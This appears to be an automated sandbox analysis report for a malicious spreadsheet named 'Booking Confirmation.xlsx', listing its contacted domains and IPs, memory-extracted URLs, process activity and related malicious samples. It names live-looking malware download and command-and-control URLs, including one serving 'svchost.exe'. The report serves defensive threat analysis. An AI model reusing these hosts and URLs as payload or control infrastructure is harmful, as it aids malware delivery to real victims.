            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://www.iask.com/0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
            http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://service2.bfast.com/0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            setyourhead.com
            		34.102.136.180
            		truetrueunknown
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            		103.125.191.5
            		truetrueunknown
            affinitymotorsales.com
            		216.130.188.93
            		truetrue
              		unknown
              www.akmh.pro
              		unknown
              		unknowntrue
                		unknown
                www.setyourhead.com
                		unknown
                		unknowntrue
                  		unknown
                  www.affinitymotorsales.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exetrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://search.ebay.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.mtv.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.rambler.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://search.rediff.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.naver.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.google.ru/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://search.daum.net/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://buscar.ozu.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://search.about.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.ask.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.cjmall.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.centrum.cz/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://suche.t-online.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.it/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.amazon.de/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2205387909.000000000861C000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://sads.myspace.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://search.sify.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://search.ebay.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://search.nifty.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.google.si/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.google.cz/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.soso.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.univision.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://search.ebay.it/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.target.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.iask.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.tesco.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.interpark.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://investor.msn.com/explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		low

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    103.125.191.5
                                                                                                                                                    		unknownViet Nam
                                                                                                                                                    		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                    216.130.188.93
                                                                                                                                                    		unknownUnited States
                                                                                                                                                    		27257WEBAIR-INTERNETUStrue
                                                                                                                                                    34.102.136.180
                                                                                                                                                    		unknownUnited States
                                                                                                                                                    		15169GOOGLEUStrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:323046
                                                                                                                                                    Start date:26.11.2020
                                                                                                                                                    Start time:09:02:15
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 9m 15s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:Booking Confirmation.xlsx
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.expl.evad.winXLSX@9/6@5/3
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 27.2% (good quality ratio 25.8%)
                                                                                                                                                    • Quality average: 72.6%
                                                                                                                                                    • Quality standard deviation: 28%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 95%
                                                                                                                                                    • Number of executed functions: 120
                                                                                                                                                    • Number of non-executed functions: 30
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsx
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    09:03:13API Interceptor120x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                    09:03:18API Interceptor69x Sleep call for process: vbc.exe modified
                                                                                                                                                    09:03:28API Interceptor33x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                    09:03:42API Interceptor223x Sleep call for process: raserver.exe modified
                                                                                                                                                    09:04:18API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    103.125.191.5Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • mndyworkfinesanotherrainbowlomoyentmntbc.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    New Order .xlsxGet hashmaliciousBrowse
                                                                                                                                                    • workfinestdysanotherrainbowlomoyentstcbn.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • workfinethdysanotherrainbowlomoyentthghf.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5/bin_xMjelaYnr43.bin
                                                                                                                                                    Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5/bin_xMjelaYnr43.bin
                                                                                                                                                    216.130.188.93Lv3pXahxWE.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.affinitymotorsales.com/kgw/?I6A=D+Ti5aRwW0y95XaEFky6cyQTuFVn7YolhM5bhw08QBy1mkfjsiVVelVow0C6HRleo18M&nlut_l=u6ApJr30GRsH7R
                                                                                                                                                    34.102.136.180PI202009255687.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.lygosfilms.info/ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2
                                                                                                                                                    VOMAXTRADING.docGet hashmaliciousBrowse
                                                                                                                                                    • www.mycapecrusade.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA==
                                                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp
                                                                                                                                                    inv.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4
                                                                                                                                                    anthon.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
                                                                                                                                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                    • www.messianicentertainment.com/mkv/
                                                                                                                                                    Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
                                                                                                                                                    PO EME39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
                                                                                                                                                    PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
                                                                                                                                                    Document Required.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
                                                                                                                                                    Payment - Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
                                                                                                                                                    Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
                                                                                                                                                    SR7UzD8vSg.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
                                                                                                                                                    fSBya4AvVj.exeGet hashmaliciousBrowse
